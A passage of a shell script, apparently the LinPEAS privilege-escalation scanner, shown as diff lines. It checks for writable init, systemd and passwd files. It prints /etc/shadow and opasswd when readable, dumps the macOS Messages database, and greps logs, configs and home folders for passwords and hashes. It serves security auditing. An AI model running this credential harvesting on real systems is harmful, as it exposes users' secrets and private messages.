[ "$IAMROOT" ] && [ -O "$f" ]; then - echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) - echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; - fi - done - done - echo "" - - print_2title "Broken links in path" - echo $PATH | tr ":" "\n" | while read d; do - find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},"; - done - echo "" - - - if [ "$MACPEAS" ]; then - print_2title "Unsigned Applications" - macosNotSigned /System/Applications - fi - - ##-- IF) Unexpected folders in / - print_2title "Unexpected in root" - if [ "$MACPEAS" ]; then - (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found - else - (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found - fi - echo "" - - ##-- IF) Files (scripts) in /etc/profile.d/ - print_2title "Files (scripts) in /etc/profile.d/" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files" - if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" - if ! [ "$IAMROOT" ] && [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - fi - echo "" - - ##-- IF) Files (scripts) in /etc/init.d/ - print_2title "Permissions in init, init.d, systemd, and rc.d" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d" - if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - if ! [ "$IAMROOT" ] && [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - fi - echo "" - - ##-- IF) Hashes in passwd file - print_list "Hashes inside passwd file? ........... " - if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - ##-- IF) Writable in passwd file - print_list "Writable passwd file? ................ " - if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else echo_no - fi - - ##-- IF) Credentials in fstab - print_list "Credentials in fstab/mtab? ........... " - if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - ##-- IF) Read shadow files - print_list "Can I read shadow files? ............. " - if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "Can I read shadow plists? ............ " - possible_check="" - (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - - print_list "Can I write shadow plists? ........... " - possible_check="" - (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - - ##-- IF) Read opasswd file - print_list "Can I read opasswd file? ............. " - if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" - else echo_no - fi - - ##-- IF) network-scripts - print_list "Can I write in network-scripts? ...... " - if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else echo_no - fi - - ##-- IF) Read root dir - print_list "Can I read root folder? .............. " - (ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no - echo "" - - ##-- IF) Root files in home dirs - print_2title "Searching root files in home dirs (limit 30)" - (find $HOMESEARCH /Users -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found - echo "" - - ##-- IF) Others files in my dirs - if ! [ "$IAMROOT" ]; then - print_2title "Searching folders owned by me containing others files on it (limit 100)" - (find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" - echo "" - fi - - ##-- IF) Readable files belonging to root and not world readable - if ! [ "$IAMROOT" ]; then - print_2title "Readable files belonging to root and readable by me but not world readable" - (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found - echo "" - fi - - ##-- IF) Modified interesting files into specific folders in the last 5mins - print_2title "Modified interesting files in the last 5mins (limit 100)" - find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," - echo "" - - ##-- IF) Writable log files - print_2title "Writable log files (logrotten) (limit 100)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation" - logrotate --version 2>/dev/null || echo_not_found "logrotate" - lastWlogFolder="ImPOsSiBleeElastWlogFolder" - logfind=$(find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100) - printf "%s\n" "$logfind" | while read log; do - if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found - if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; - elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case - elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; - elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; - fi - fi - done - - echo "" - - ##-- IF) Files inside my home - print_2title "Files inside $HOME (limit 20)" - (ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found - echo "" - - ##-- IF) Files inside /home - print_2title "Files inside others home (limit 20)" - (find $HOMESEARCH /Users -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found - echo "" - - ##-- IF) Mail applications - print_2title "Searching installed mail applications" - ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" - echo "" - - ##-- IF) Mails - print_2title "Mails (limit 50)" - (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_GREEN},g") || echo_not_found - echo "" - - ##-- IF) Backup folders - print_2title "Backup folders" - printf "%s\n" "$backup_folders" | while read b ; do - ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; - ls -l "$b" 2>/dev/null && echo "" - done - echo "" - - ##-- IF) Backup files - print_2title "Backup files (limited 100)" - backs=$(find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) - printf "%s\n" "$backs" | head -n 100 | while read b ; do - if [ -r "$b" ]; then - ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; - fi; - done - echo "" - - ##-- IF) DB files - if [ "$MACPEAS" ]; then - print_2title "Reading messages database" - sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null - sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null - sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null - - fi - print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" - FILECMD="$(command -v file 2>/dev/null)" - if [ "$PSTORAGE_DATABASE" ]; then - printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if [ "$FILECMD" ]; then - echo "Found: $(file $f)" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; - else - echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; - fi - done - SQLITEPYTHON="" - echo "" - printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd - printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC - if [ "$(command -v sqlite3 2>/dev/null)" ]; then - tables=$(sqlite3 $f ".tables" 2>/dev/null) - #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" - elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then - SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null) - tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null) - #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" - else - tables="" - fi - if [ "$tables" ]; then - printf "%s\n" "$tables" | while read t; do - columns="" - # Search for credentials inside the table using sqlite3 - if [ -z "$SQLITEPYTHON" ]; then - columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE") - # Search for credentials inside the table using python - else - columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) - fi - #Check found columns for interesting fields - INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") - if [ "$INTCOLUMN" ]; then - printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" - printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" - (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head - fi - done - echo "" - fi - fi - done - fi - echo "" - - if [ "$MACPEAS" ]; then - print_2title "Downloaded Files" - sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" - fi - - ##-- IF) Web files - print_2title "Web files?(output limit)" - ls -alhR /var/www/ 2>/dev/null | head - ls -alhR /srv/www/htdocs/ 2>/dev/null | head - ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head - ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head - echo "" - - ##-- IF) All hidden files - print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" - find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70 - echo "" - - ##-- IF) Readable files in /tmp, /var/tmp, bachups - print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" - filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70) - printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done - echo "" - - ##-- IF) Interesting writable files by ownership or all - if ! [ "$IAMROOT" ]; then - print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" - #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all - obmowbe=$(find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) - printf "%s\n" "$obmowbe" | while read entry; do - if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; - elif echo "$entry" | grep -qE "$writeVB"; then - echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," - else - echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," - fi - done - echo "" - fi - - ##-- IF) Interesting writable files by group - if ! [ "$IAMROOT" ]; then - print_2title "Interesting GROUP writable files (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" - for g in $(groups); do - printf " Group $GREEN$g:\n$NC"; - iwfbg=$(find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) - printf "%s\n" "$iwfbg" | while read entry; do - if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; - elif echo "$entry" | grep -Eq "$writeVB"; then - echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," - else - echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," - fi - done - done - echo "" - fi - - ##-- IF) Passwords in config PHP files - print_2title "Searching passwords in config PHP files" - printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done - echo "" - - ##-- IF) TTY passwords - print_2title "Checking for TTY (sudo/su) passwords in audit logs" - aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" - find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" - echo "" - - ##-- IF) IPs inside logs - print_2title "Finding IPs inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70 - echo "" - - ##-- IF) Passwords inside logs - print_2title "Finding passwords inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," - echo "" - - ##-- IF) Emails inside logs - print_2title "Finding emails inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g" - echo "" - - ##-- IF) Passwords files in home - print_2title "Finding *password* or *credential* files in home (limit 70)" - (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found - echo "" - - if ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then - ##-- IF) Find possible files with passwords - print_2title "Finding passwords inside key folders (limit 70) - only PHP files" - intpwdfiles=$(timeout 150 grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$HOMESEARCH" /var/www /usr/local/www/ "$backup_folders_row" /tmp /etc /root /mnt /Users /private 2>/dev/null) - printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" - echo "" - - print_2title "Finding passwords inside key folders (limit 70) - no PHP files" - printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" - echo "" - - ##-- IF) Find possible files with passwords - print_2title "Finding possible password variables inside key folders (limit 140)" - timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" - timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" - echo "" - - ##-- IF) Find possible conf files with passwords - print_2title "Finding possible password in config files" - ppicf=$(find "$HOMESEARCH" /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) - printf "%s\n" "$ppicf" | while read f; do - if grep -qEiI 'passwd.*|creden.*' \"$f\" 2>/dev/null; then - echo "$ITALIC $f$NC" - grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g" - fi - done - echo "" - - ##-- IF) Find possible files with usernames - print_2title "Finding 'username' string inside key folders (limit 70)" - timeout 150 grep -RiIE "username.*[=:].+" "$HOMESEARCH" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" - timeout 150 grep -RiIE "username.*[=:].+" /var/www "$backup_folders_row" /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" - echo "" - - ##-- IF) Specific hashes inside files - print_2title "Searching specific hashes inside files - less false positives (limit 70)" - regexblowfish='\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*' - 